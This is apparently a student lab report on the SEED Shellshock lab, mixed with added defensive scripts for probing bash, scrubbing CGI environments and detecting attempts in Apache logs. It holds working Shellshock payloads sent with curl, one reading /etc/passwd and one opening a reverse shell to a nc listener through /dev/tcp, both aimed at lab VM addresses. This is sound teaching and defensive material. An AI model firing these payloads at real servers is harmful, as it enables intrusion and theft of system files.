| title | Shellshock Attack Lab |
|---|---|
| author | Xinyi Li |
| date | \today{} |
Instruction: https://seedsecuritylabs.org/Labs_16.04/PDF/Shellshock.pdf
Use the following commands to define a shell function, export it into the environment, and then observe whether the child shell prints "extra" when it is started as /bin/bash_shellshock or as /bin/bash.
$ foo='() { echo "hello world"; }; echo "extra";'
$ export foo
As expected, starting /bin/bash_shellshock prints the extra line, while /bin/bash prints nothing extra.
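Comparing the two shells by hand works for the lab, but a repeatable probe is more useful when checking a machine. The script below is an added example, not part of the lab handout: classify_bash runs a given bash binary with a probe variable whose value is a do-nothing function body followed by an extra command, and reports whether that extra command ran during environment import. The PROBE variable name and the marker string are assumptions made for this example; the two binary paths in the usage comment are the ones the lab VM provides.

```shell
#!/bin/sh
# Added example, not from the lab handout: classify a bash binary by whether it
# imports function definitions from arbitrary environment variables, which is
# the difference the lab observes between /bin/bash_shellshock and /bin/bash.
# The probe value is a do-nothing function body followed by an extra command;
# a vulnerable bash runs the extra command while importing the variable, a
# patched one keeps the whole value as plain data and prints nothing.
classify_bash() {
    bash_bin="$1"
    if [ ! -x "$bash_bin" ]; then
        echo missing
        return 0
    fi
    # PROBE and the marker string are names chosen for this example.
    out=$(env PROBE='() { :;}; echo SHELLSHOCK_PROBE_RAN' "$bash_bin" -c 'true' 2>/dev/null)
    case "$out" in
        *SHELLSHOCK_PROBE_RAN*) echo vulnerable ;;
        *) echo patched ;;
    esac
}

# Print one line per candidate binary, e.g. both shells installed in the lab VM.
report_bash_binaries() {
    for b in "$@"; do
        printf '%s: %s\n' "$b" "$(classify_bash "$b")"
    done
}

# Usage: report_bash_binaries /bin/bash_shellshock /bin/bash
```

On the lab VM the report shows the unpatched binary as vulnerable and the system bash as patched; on a maintained system both entries should read patched.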
$ su
$ cp myprog.cgi /usr/lib/cgi-bin
$ sudo chmod 755 /usr/lib/cgi-bin/myprog.cgi
Apache creates a child process that runs bash_shellshock through exec(); bash_shellshock replaces $$ with its own process ID, so the command strings /proc/$$/environ in the CGI script executes correctly while the HTTP request is being handled.
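Because every request header reaches the CGI program as an HTTP_* environment variable before bash even starts, one mitigation that does not depend on the bash version is to scrub the environment between Apache and the handler. The wrapper below is an added example, not code from the lab or from Apache: it drops any NAME=VALUE pair whose value begins with the function prefix "() {" and then execs the real handler with the cleaned environment. The handler path in the usage comment is a placeholder, and the wrapper assumes no environment value contains a raw newline (HTTP header values cannot).

```shell
#!/bin/sh
# Added example, not part of the SEED lab: a wrapper placed in front of a CGI
# handler that removes environment values shaped like exported bash functions
# before the handler (and any bash it spawns) sees them. Apache turns each
# request header into an HTTP_* variable, so a crafted User-Agent arrives as
# HTTP_USER_AGENT; a patched bash ignores such values, this wrapper removes
# them regardless of which bash is installed.

# Return 0 when a NAME=VALUE line carries a value beginning with "() {".
is_function_export() {
    case "${1#*=}" in
        "() {"*) return 0 ;;
        *) return 1 ;;
    esac
}

# Read NAME=VALUE lines on stdin and print only those safe to pass on.
# Assumes one variable per line, i.e. no raw newlines inside values.
scrub_env_lines() {
    while IFS= read -r kv; do
        is_function_export "$kv" || printf '%s\n' "$kv"
    done
}

# Replace this process with the real handler, passing only the scrubbed
# variables (env -i starts from an empty environment).
run_cgi_clean() {
    handler="$1"
    set --
    while IFS= read -r kv; do
        set -- "$@" "$kv"
    done <<EOF
$(env | scrub_env_lines)
EOF
    exec env -i "$@" "$handler"
}

# Usage (placeholder path): run_cgi_clean /usr/lib/cgi-bin/real_handler.cgi
```

Installing the wrapper under the URL the clients request and pointing it at the real script keeps the handler unchanged; the check itself is a plain prefix match on the value, which is exactly what the unpatched bash keys on when it decides to import a function.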
For instance, I can steal the server's password file using
$ curl -A "() { echo hello;}; echo Content-type: text/plain; echo; /bin/cat /etc/passwd;" http://localhost/cgi-bin/myprog.cgi
However, because /etc/shadow is readable only by root, I cannot steal its contents unless the web server is running as root.
- The attacker: 10.0.2.15
- The server: 10.0.2.4
First, build a TCP connection:
$ nc -lv 9090
This blocks, listening on port 9090, and prints whatever it receives. Keep this shell running and issue the next command from a second shell.
From the second shell, use Shellshock to redirect the server's stdin/stdout to the listener.
$ curl -A "() { echo hello;}; echo Content-type: text/plain; echo; echo; /bin/bash -i > /dev/tcp/10.0.2.15/9090 0<&1 2>&1" http://10.0.2.4/cgi-bin/myprog.cgi
So a reverse shell is created.
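Both the file-read request and the reverse-shell request above carry their payload in the User-Agent header, which Apache's combined log format records as the last quoted field, so such attempts are visible in the access log after the fact. The script below is an added example, not part of this report: it scans log lines for any quoted field (request, referer or user-agent) that begins with the bash function prefix "() {", the marker both payloads share. The sample log lines are constructed for this example and are not real server output.

```shell
#!/bin/sh
# Added example, not part of the lab report: detection of Shellshock attempts in
# an Apache combined-format access log. The payload travels in a request header,
# and the combined format quotes the request line, referer and user-agent, so
# the marker to look for is a quoted field whose value starts with "() {".
# The lines below are constructed for this example.
SAMPLE_LOG='10.0.2.15 - - [01/Jan/2016:12:00:01 +0000] "GET /cgi-bin/myprog.cgi HTTP/1.1" 200 312 "-" "curl/7.47.0"
10.0.2.15 - - [01/Jan/2016:12:00:05 +0000] "GET /cgi-bin/myprog.cgi HTTP/1.1" 200 1234 "-" "() { echo hello;}; echo Content-type: text/plain; echo; /bin/cat /etc/passwd;"
10.0.2.15 - - [01/Jan/2016:12:00:09 +0000] "GET /index.html HTTP/1.1" 200 88 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.2.15 - - [01/Jan/2016:12:00:12 +0000] "GET /cgi-bin/myprog.cgi HTTP/1.1" 200 0 "() { :;}; echo from-referer" "curl/7.47.0"'

# ERE for a quoted field beginning with the function prefix: "() {
SHELLSHOCK_RE='"\(\) \{'

# Print every matching line from stdin; exit status 0 if any line matched.
find_shellshock_attempts() {
    grep -E "$SHELLSHOCK_RE"
}

# Count matching lines from stdin. grep -c exits 1 when the count is 0,
# which is not an error here, so only a real grep failure propagates.
count_shellshock_attempts() {
    grep -c -E "$SHELLSHOCK_RE" || [ $? -eq 1 ]
}

# Usage: printf '%s\n' "$SAMPLE_LOG" | find_shellshock_attempts
# Usage: count_shellshock_attempts < /var/log/apache2/access.log
```

Anchoring the pattern to the opening quote keeps ordinary user-agents that merely mention braces out of the results, and the same expression can be fed to an alerting pipeline that tails the live log. The unpatched bash only reacts to a value that starts exactly with "() {", so the anchor reflects the trigger condition rather than an arbitrary choice.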
Reproduction of Test 3 succeeds, while the other two tasks fail.
This is because the environment variables are printed by bash itself rather than passed to any caller, so this behavior is not affected by the shell version.

